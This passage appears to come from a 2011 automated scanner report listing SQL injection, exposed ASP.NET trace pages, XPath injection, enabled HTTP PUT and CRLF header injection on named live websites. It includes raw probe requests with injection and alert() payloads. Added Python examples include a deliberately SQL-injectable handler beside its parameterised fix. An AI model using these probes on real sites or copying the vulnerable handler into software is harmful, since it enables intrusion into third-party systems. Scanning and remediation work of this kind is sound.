User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.straight.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 10:17:57 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.17
Cache-Control: public, max-age=600
Last-Modified: Tue, 03 May 2011 10:17:57 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1304417877"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 35837

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" la
...[SNIP]...
<!--
jQuery.extend(Drupal.settings, {"basePath":"\/","CTools":{"pageId":"page-3f30ff464c7cd7b159b1d2163f648e81"},"thickbox":{"close":"Close","next":"Next \u003e","prev":"\u003c Prev","esc_key":"or Esc Key","next_close":"Next \/ Close on last","image_count":"Image !current of !total"},"extlink":{"extTarget":"_blank","extClass":"ext","extSubdomains":1,"extExclude":"(livenation\\.com\\\/edp)|(static\\.ak\\.fbcdn.net\\\/connect\\.php)|(www\\.addthis\\.com\\\/bookmark\\.php)","extInclude":"","extAlert":0,"extAlertText":"This link will take you to an external web site. We are not responsible for their content.","mailtoClass":"mailto"}});
//--><!]]>
</script>
<script type="text/javascript">
<!--//--><![CDATA[//><!--
overMenuDefault = 'dynamic-persistent-menu-menu';
//--><!]]>
</script>
<script type="text/javascript">
<!--//--><![CDATA[//><!--
subMenuTimeout = 3600000;
//--><!]]>
</script>
<script type="text/javascript">
<!--//--><![CDATA[//><!--
document.write(unescape("%3Cscript src='http://partner.googleadservices.com/gampad/google_service.js' type='text/javascript'%3E%3C/script%3E"));

//--><!]]>
</script>
<script type="text/javascript">
<!--//--><![CDATA[//><!--
GS_googleAddAdSenseService("ca-pub-1107966834184205");
GS_googleEnableAllServices();

//--><!]]>
</script>
<script type="text/javascript">
<!--//--><![CDATA[//><!--
GA_googleAddSlot("ca-pub-1107966834184205", "CouponsVertical");
GA_googleAddSlot("ca-pub-1107966834184205", "Banner");
GA_googleAddSlot("ca-pub-1107966834184205", "Leaderboard");
GA_googleAddSlot("ca-pub-1107966834184205", "Leaderboard_Bottom");

//--><!]]>
</script>
<script type="text/javascript">
<!--//--><![CDATA[//><!--
GA_googleFetchAds();

//--><!]]>
</script>

<script language="javascript" type="text/javascript" src="/js/article_specific.js.min"></script>

<script language="javascript" type="text/javascript" src="/js/global.js.min.js"></script>

<script language="JavaScript">GA_googleAddAttr("section", "homepage");</script>
<script language="JavaScript">GA_googleAddAttr("section", "");</script>
<script language="
...[SNIP]...

1.25. http://www.thechildrenswearoutlet.com/favicon.ico [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.thechildrenswearoutlet.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 54576496%20or%201%3d1--%20 and 54576496%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present. Here the 1=1 request was answered by PHP with a 302 to /?sef_rewrite=1, while the 1=2 request was answered by Apache with the static icon file (image/x-icon, Last-Modified, ETag). The two requests were handled by different components, which points at a rewrite or filtering rule keyed on the request rather than at a query; neither response contains database output.

Request 1

GET /favicon.ico?154576496%20or%201%3d1--%20=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.thechildrenswearoutlet.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 302 Moved Temporarily
Date: Tue, 03 May 2011 10:35:27 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.13
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: -1
Last-Modified: Tue, 03 May 2011 10:35:27 GMT
Location: http://thechildrenswearoutlet.com/?sef_rewrite=1
Content-Length: 0
Content-Type: text/html; charset=utf-8

Request 2

GET /favicon.ico?154576496%20or%201%3d2--%20=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.thechildrenswearoutlet.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:35:29 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Wed, 14 Apr 2010 19:20:24 GMT
ETag: "53a82e0-47e-4843745164e00"
Accept-Ranges: bytes
Content-Length: 1150
Content-Type: image/x-icon

...[SNIP]...
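The following is an added example, not code from the XSS.CX report or from any site listed in it. It reproduces in-process the two tests the scanner applied to the /favicon.ico findings above (the quote / double-quote error-based test of 1.16 and 1.20-1.22, and the "or 1=1" / "or 1=2" difference-based test of 1.17-1.19 and 1.23-1.25), runs them against a deliberately vulnerable handler and against the parameterised fix the remediation text calls for, and encodes the caveat noted in several findings that a 403 returned only for the "1=1" payload points at a request filter rather than at SQL. The vulnerable query is modelled on the fragment visible in the lvhn.org error; the table and column names around that fragment, and the use of SQLite in place of MySQL, are assumptions.

```python
"""Added example; not part of the XSS.CX report or of any site listed in it.

Reproduces in-process the two tests the scanner ran against the /favicon.ico
findings above, and the fix the remediation text calls for:
  * vulnerable_handler(): path concatenated into SQL, modelled on the fragment
    visible in the lvhn.org error ("... and a.template_id = b.template_id");
    the tables and columns around that fragment are assumptions;
  * fixed_handler(): the same lookup as a parameterised query;
  * error_based_check(): the quote / double-quote test;
  * difference_based_check(): the "or 1=1" / "or 1=2" test, with the
    403-only-on-1=1 filter caveat.
SQLite stands in for MySQL, so the error text differs; the logic does not.
"""
import re
import sqlite3
from typing import Callable, Dict, Optional, Tuple

Response = Tuple[int, str]           # (HTTP status, body)
Handler = Callable[[str], Response]  # takes the request path

# Signatures the report uses to attribute the backend, plus SQLite's own.
DB_ERROR_SIGNATURES: Dict[str, re.Pattern] = {
    "MySQL": re.compile(r"You have an error in your SQL syntax"),
    "Microsoft SQL Server": re.compile(
        r"Unclosed quotation mark|Incorrect syntax near|OLE DB Provider"),
    "SQLite (stand-in used here)": re.compile(r"unrecognized token|syntax error"),
}


def make_db() -> sqlite3.Connection:
    """Constructed sample schema: a page table joined to a template table."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE pages (path TEXT, template_id INTEGER);
        CREATE TABLE templates (template_id INTEGER, body TEXT);
        INSERT INTO pages VALUES ('/index.php', 1);
        INSERT INTO templates VALUES (1, '<html>home</html>');
    """)
    return conn


def vulnerable_handler(conn: sqlite3.Connection, path: str) -> Response:
    """Path concatenated into the query; the error is echoed as lvhn.org does."""
    sql = ("SELECT b.body FROM pages a, templates b WHERE a.path = '" + path
           + "' AND a.template_id = b.template_id")
    try:
        row = conn.execute(sql).fetchone()
    except sqlite3.Error as exc:
        return 200, "invalid query:" + str(exc)   # verbose error, HTTP 200
    return (200, row[0]) if row else (404, "Page Not Found")


def fixed_handler(conn: sqlite3.Connection, path: str) -> Response:
    """Same lookup with a bound parameter: a quote in the path is just data."""
    sql = ("SELECT b.body FROM pages a, templates b "
           "WHERE a.path = ? AND a.template_id = b.template_id")
    try:
        row = conn.execute(sql, (path,)).fetchone()
    except sqlite3.Error:
        return 500, "Internal Server Error"      # generic: no query text leaks
    return (200, row[0]) if row else (404, "Page Not Found")


def _db_error(body: str) -> Optional[str]:
    return next((db for db, rx in DB_ERROR_SIGNATURES.items() if rx.search(body)), None)


def error_based_check(handler: Handler, path: str = "/favicon.ico") -> dict:
    """One quote breaks the statement; two quotes (an escaped quote inside the
    literal) repair it. Error that vanishes on '' -> Certain; error only -> Firm."""
    db_one = _db_error(handler(path + "'")[1])
    db_two = _db_error(handler(path + "''")[1])
    if db_one and not db_two:
        return {"vulnerable": True, "confidence": "Certain", "database": db_one}
    if db_one:
        return {"vulnerable": True, "confidence": "Firm", "database": db_one}
    return {"vulnerable": False, "confidence": None, "database": None}


def difference_based_check(handler: Handler, path: str = "/favicon.ico",
                           marker: str = "96460785") -> dict:
    """Boolean test: a true and a false predicate in otherwise identical
    requests. Any difference is only Tentative evidence."""
    true_resp = handler(f"{path}{marker}' or 1=1-- ")
    false_resp = handler(f"{path}{marker}' or 1=2-- ")
    if true_resp == false_resp:
        return {"vulnerable": False, "confidence": None, "reason": "identical responses"}
    # Editor's caveat: a 403 only on the payload containing the literal
    # "or 1=1" points at a request filter matching that string, not at SQL.
    if true_resp[0] == 403 and false_resp[0] != 403:
        return {"vulnerable": False, "confidence": None,
                "reason": "403 only on the 1=1 payload: probable request filter"}
    return {"vulnerable": True, "confidence": "Tentative",
            "reason": f"status {true_resp[0]} vs {false_resp[0]}"}


if __name__ == "__main__":
    db = make_db()
    for name, handler in (("vulnerable", vulnerable_handler), ("fixed", fixed_handler)):
        bound: Handler = lambda p, h=handler: h(db, p)
        print(name, error_based_check(bound), difference_based_check(bound))
```

Run as a script it prints a Certain error-based result and a Tentative difference-based result for the concatenating handler, and a clean result on both tests for the parameterised one; the 403 branch never fires here because no filter sits in front of the in-process handlers, but it is the branch that would have downgraded findings 1.18, 1.19 and 1.23.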

2. ASP.NET tracing enabled
There are 4 instances of this issue:

Issue background

ASP.NET tracing is a debugging feature which is designed for use during development to help troubleshoot problems. It discloses sensitive information to users, and if enabled in production contexts may present a serious security threat.

Application-level tracing enables any user to retrieve full details about recent requests to the application, including those of other users. This information includes session tokens and request parameters, which may enable an attacker to compromise other users and even take control of the entire application.

Page-level tracing returns the same information, but relating only to the current request. This may still contain sensitive data in session and server variables which would be of use to an attacker.

Issue remediation

To disable tracing, open the Web.config file for the application, and find the <trace> element within the <system.web> section. Either set the enabled attribute to "false" (to disable tracing) or set the localOnly attribute to "true" (to enable tracing only on the server itself).

Note that even with tracing disabled in this way, it is possible for individual pages to turn on page-level tracing either within the Page directive of the ASP.NET page, or programmatically through application code. If you observe tracing output only on some application pages, you should review the page source and the code behind, to find the reason why tracing is occurring.

It is strongly recommended that you refer to your platform's documentation relating to this issue, and do not rely solely on the above remediation.
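The following is an added example, not code from the report or from any site it lists: an offline audit of the two places the remediation above says tracing can be switched on. It applies the rules stated there (application-level tracing reaches remote clients only when the trace element has enabled="true" and localOnly="false", using the ASP.NET defaults of enabled="false" and localOnly="true" for anything absent) and then scans page sources for a Page directive carrying Trace="true", which re-enables page-level tracing regardless of Web.config. The Web.config and .aspx contents below are constructed samples, not files from any of the four hosts.

```python
"""Added example, not part of the report or of any listed site: an offline
audit of ASP.NET trace settings. The Web.config and .aspx samples below are
constructed for the example."""
import re
import xml.etree.ElementTree as ET
from typing import Dict, List

# <%@ Page ... Trace="true" %> turns on page-level tracing regardless of Web.config.
PAGE_TRACE_RE = re.compile(r'<%@\s*Page\b[^%]*\bTrace\s*=\s*"true"', re.IGNORECASE)


def app_trace_status(web_config_xml: str) -> Dict[str, bool]:
    """Effective <system.web><trace> settings. ASP.NET defaults, applied when
    the element or an attribute is absent: enabled="false", localOnly="true"."""
    root = ET.fromstring(web_config_xml)
    trace = root.find("./system.web/trace")
    if trace is not None:
        enabled = trace.get("enabled", "false").lower() == "true"
        local_only = trace.get("localOnly", "true").lower() == "true"
    else:
        enabled, local_only = False, True
    return {"enabled": enabled, "localOnly": local_only,
            # trace.axd answers remote clients only in this combination
            "remote_trace_axd": enabled and not local_only}


def pages_with_trace(sources: Dict[str, str]) -> List[str]:
    """Pages that re-enable tracing in their directive (filename -> source)."""
    return sorted(name for name, src in sources.items() if PAGE_TRACE_RE.search(src))


# Constructed samples: the weak configuration beside the corrected one.
WEAK_WEB_CONFIG = """<configuration>
  <system.web>
    <trace enabled="true" localOnly="false" pageOutput="false" requestLimit="40" />
  </system.web>
</configuration>"""

FIXED_WEB_CONFIG = """<configuration>
  <system.web>
    <trace enabled="false" localOnly="true" />
  </system.web>
</configuration>"""

SAMPLE_PAGES = {
    "Default.aspx": '<%@ Page Language="C#" Trace="true" AutoEventWireup="true" %>',
    "Contact.aspx": '<%@ Page Language="C#" Trace="false" %>',
    "About.aspx": '<%@ Page Language="C#" %>',
}

if __name__ == "__main__":
    print("weak config:", app_trace_status(WEAK_WEB_CONFIG))
    print("fixed config:", app_trace_status(FIXED_WEB_CONFIG))
    print("page-level tracing in:", pages_with_trace(SAMPLE_PAGES))
```

Either of the two remediation settings on its own closes remote access to trace.axd, which is why the check keys on the combination rather than on enabled alone; the page scan is the second half of the remediation text, since a Trace="true" directive will still produce trace output on that page after Web.config has been corrected.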



2.1. http://www.allentate.com/trace.axd

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.allentate.com
Path:   /trace.axd

Issue detail

ASP.NET tracing appears to be enabled at the application level.

Request

GET /trace.axd HTTP/1.0
Host: www.allentate.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 03 May 2011 10:36:23 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 4641
Set-Cookie: Coyote-2-42a2c514=42a2c505:0;Path=/

<html>
<head>
<style type="text/css">
span.tracecontent b { color:white }
span.tracecontent { background-color:white; color:black;font: 10pt verdana, arial; }
span.tracecontent table { clear:left
...[SNIP]...
<body>
<span class="tracecontent">
<table cellspacing="0" cellpadding="0" border="0" width="100%">
...[SNIP]...

2.2. http://www.endlessvacation.com/trace.axd

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.endlessvacation.com
Path:   /trace.axd

Issue detail

ASP.NET tracing appears to be enabled at the application level.

Request

GET /trace.axd HTTP/1.0
Host: www.endlessvacation.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 03 May 2011 10:20:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 4626

<html>
<head>
<style type="text/css">
span.tracecontent b { color:white }
span.tracecontent { background-color:white; color:black;font: 10pt verdana, arial; }
span.tracecontent table { clear:left
...[SNIP]...
<body>
<span class="tracecontent">
<table cellspacing="0" cellpadding="0" border="0" width="100%">
...[SNIP]...

2.3. http://www.identitychecks.com/trace.axd

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.identitychecks.com
Path:   /trace.axd

Issue detail

ASP.NET tracing appears to be enabled at the application level.

Request

GET /trace.axd HTTP/1.0
Host: www.identitychecks.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 03 May 2011 10:21:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
COMMERCE-SERVER-SOFTWARE: Microsoft Commerce Server, Enterprise Edition
Set-Cookie: SourceCode=9KWB18; expires=Wed, 04-May-2011 10:21:50 GMT; path=/
Set-Cookie: StoreSourceCode=9KWB18; expires=Wed, 04-May-2011 10:21:50 GMT; path=/
Set-Cookie: TrackingSourceCode=9KWB18; expires=Wed, 04-May-2011 10:21:50 GMT; path=/
Set-Cookie: IDENT_CD_Cookie={6d0c0bb7-ba56-4773-bf25-81411b14a2c4}; expires=Fri, 03-May-2041 10:21:50 GMT; path=/
Set-Cookie: IDENT_CD_Cookie={6d0c0bb7-ba56-4773-bf25-81411b14a2c4}; expires=Fri, 03-May-2041 10:21:50 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8

<html>
<head>
<style type="text/css">
span.tracecontent b { color:white }
span.tracecontent { background-color:white; color:black;font: 10pt verdana, arial; }
span.tracecontent table { clear:left
...[SNIP]...
<body>
<span class="tracecontent">

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/1999/REC-html401-19991224/loose.dtd">
...[SNIP]...

2.4. http://www.woodworking.com/trace.axd

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.woodworking.com
Path:   /trace.axd

Issue detail

ASP.NET tracing appears to be enabled at the application level.

Request

GET /trace.axd HTTP/1.0
Host: www.woodworking.com

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Date: Tue, 03 May 2011 10:26:21 GMT
Connection: close

<html>
<head>
<style type="text/css">
span.tracecontent b { color:white }
span.tracecontent { background-color:white; color:black;font: 10pt verdana, arial; }
span.tracecontent table { clear:left
...[SNIP]...
<body>
<span class="tracecontent">


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
...[SNIP]...

3. XPath injection

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.atlanta.net
Path:   /favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 1, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application appears to be using the ASP.NET XPath APIs.

Issue background

XPath injection vulnerabilities arise when user-controllable data is incorporated into XPath queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Depending on the purpose for which the vulnerable query is being used, an attacker may be able to exploit an XPath injection flaw to read sensitive application data or interfere with application logic.

Issue remediation

User input should be strictly validated before being incorporated into XPath queries. In most cases, it will be appropriate to accept input containing only short alphanumeric strings. At the very least, input containing any XPath metacharacters such as " ' / @ = * [ ] ( and ) should be rejected.

Request

GET /favicon.ico' HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.atlanta.net
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 500 Internal Server Error
Date: Tue, 03 May 2011 10:51:19 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 10203

<html>
<head>
<title>This is an unclosed string.</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family
...[SNIP]...
</b>System.Xml.XPath.XPathException: This is an unclosed string.<br>
...[SNIP]...
<pre>

[XPathException: This is an unclosed string.]
MS.Internal.Xml.XPath.XPathScanner.ScanString() +1123732
MS.Internal.Xml.XPath.XPathScanner.NextLex() +3962705
MS.Internal.Xml.XPath.XPathParser.ParsePrimaryExpr(AstNode qyInput) +3947904
MS.Internal.Xml.XPath.
...[SNIP]...

4. HTTP PUT enabled
There are 2 instances of this issue:

Issue background

The HTTP PUT method is used to upload data which is saved on the server at a user-supplied URL. If enabled, an attacker can place arbitrary, and potentially malicious, content into the application. Depending on the server's configuration, this may lead to compromise of other users (by uploading client-executable scripts), compromise of the server (by uploading server-executable code), or other attacks.

Issue remediation

You should refer to your platform's documentation to determine how to disable the HTTP PUT method on the server.


4.1. http://www.findire.com/favicon.ico

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.findire.com
Path:   /favicon.ico

Issue detail

HTTP PUT is enabled on the web server. The file /d4df4917b70f8242.txt was uploaded to the server using the PUT verb, and the contents of the file were subsequently retrieved using the GET verb.

Request 1

PUT /d4df4917b70f8242.txt HTTP/1.0
Host: www.findire.com
Content-Length: 16

310947143a6b91b6

Response 1

HTTP/1.1 201 Created
Connection: close
Date: Tue, 03 May 2011 10:45:01 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: http://www.findire.com/d4df4917b70f8242.txt
Content-Length: 0
Allow: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, LOCK, UNLOCK

Request 2

GET /d4df4917b70f8242.txt HTTP/1.0
Host: www.findire.com

Response 2

HTTP/1.1 200 OK
Content-Length: 16
Content-Type: text/plain
Last-Modified: Tue, 03 May 2011 10:45:01 GMT
Accept-Ranges: bytes
ETag: W/"ec633c277f9cc1:3a6"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 10:45:00 GMT
Connection: close

310947143a6b91b6

4.2. http://www.thenursingscholars.com/favicon.ico

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thenursingscholars.com
Path:   /favicon.ico

Issue detail

HTTP PUT is enabled on the web server. The file /9ca2d0099ce061f7.txt was uploaded to the server using the PUT verb, and the contents of the file were subsequently retrieved using the GET verb.

Request 1

PUT /9ca2d0099ce061f7.txt HTTP/1.0
Host: www.thenursingscholars.com
Content-Length: 16

4b19641b55482e5d

Response 1

HTTP/1.1 201 Created
Connection: close
Date: Tue, 03 May 2011 10:38:45 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: http://www.thenursingscholars.com/9ca2d0099ce061f7.txt
Content-Length: 0
Allow: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, LOCK, UNLOCK

Request 2

GET /9ca2d0099ce061f7.txt HTTP/1.0
Host: www.thenursingscholars.com

Response 2

HTTP/1.1 200 OK
Content-Length: 16
Content-Type: text/plain
Last-Modified: Tue, 03 May 2011 10:38:45 GMT
Accept-Ranges: bytes
ETag: W/"40d147477e9cc1:a1c"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 10:38:44 GMT
Connection: close

4b19641b55482e5d

5. HTTP header injection
There are 10 instances of this issue:

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.


5.1. http://ad.doubleclick.net/ad/tnews.lee.net/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /ad/tnews.lee.net/

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 15392%0d%0ac029a9949ab was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /15392%0d%0ac029a9949ab/tnews.lee.net/;r=1;sz=300x250;ord=123456789ord=0.7145021600827461?? HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=1190;c=1;s=1;d=9;w=300;h=250;$=audiencescience300x250
Cookie: id=c60bd0733000097||t=1297260501|et=730|cs=g_qf15ye

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/15392
c029a9949ab
/tnews.lee.net/;r=1;sz=300x250;ord=123456789ord=0.7145021600827461:
Date: Tue, 03 May 2011 15:42:25 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

5.2. http://ad.doubleclick.net/adi/N763.no_url_specifiedOX2462/B4639841.8 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N763.no_url_specifiedOX2462/B4639841.8

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 14b28%0d%0a15d18364756 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /14b28%0d%0a15d18364756/N763.no_url_specifiedOX2462/B4639841.8;sz=300x250;click=http://cdslog.contextweb.com/CDSLogger/L.aspx?q=C~503597~2587~54012~108044~94417~3~0~0~maysville-online.com~2~8~1~0~2~1~PEiOeaHGRLH4quYZj5mgESimscR103Gq~16~2~gDLdEnJ4dUI3~RiC6i2pCL3Ub~1~0~1~~;ord=1771002466? HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=1190;c=1;s=1;d=9;w=300;h=250;$=audiencescience300x250
Cookie: id=c60bd0733000097||t=1297260501|et=730|cs=g_qf15ye

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/14b28
15d18364756
/N763.no_url_specifiedOX2462/B4639841.8;sz=300x250;click=http: //cdslog.contextweb.com/CDSLogger/L.aspx
Date: Tue, 03 May 2011 15:42:39 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

5.3. http://ad.doubleclick.net/adj/cm.rev_lee/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/cm.rev_lee/

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 7b98a%0d%0a6411b0e67d0 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /7b98a%0d%0a6411b0e67d0/cm.rev_lee/;net=cm;u=,cm-77237941_1304437410,11fda490648f83c,Miscellaneous,ax.300;;cmw=owl;sz=300x250;net=cm;ord1=975335;contx=Miscellaneous;an=300;dc=w;btg=;ord=0.3433780161396228? HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.maysville-online.com/content/?c3a2e%22-alert(%22DORK%22)-%22f8cf8d87874=1
Cookie: id=c60bd0733000097||t=1297260501|et=730|cs=g_qf15ye

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/7b98a
6411b0e67d0
/cm.rev_lee/;net=cm;u=,cm-77237941_1304437410,11fda490648f83c,Miscellaneous,ax.300;;cmw=owl;sz=300x250;net=cm;ord1=975335;contx=Miscellaneous;an=300;dc=w;btg=;ord=0.3433780161396228:
Date: Tue, 03 May 2011 15:44:57 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

5.4. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js [$ parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The value of the $ request parameter is copied into the Set-Cookie response header. The payload e6567%0d%0aedcda395a45 was submitted in the $ parameter. This caused a response containing an injected HTTP header.

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1&a=0&f=&n=1190&r=5&d=9&q=&$=e6567%0d%0aedcda395a45&s=1&z=0.01697743690668352 HTTP/1.1
Host: d7.zedo.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.maysville-online.com/favicon.ico?be4e4%22-alert(1)-%22ccebc516c28=1
Cookie: ZCBC=1; FFgeo=2241452; FFcat=1190,1,9; FFad=0; FFChanCap=1583B1190,1#675962|0,1,1; ZEDOIDA=-SHATcGt89Z6bBFZFIn3XV-r~050311; ZEDOIDX=21

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1190:e6567
edcda395a45
;expires=Wed, 04 May 2011 05: 00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1190,1,9;expires=Wed, 04 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=1;expires=Wed, 04 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
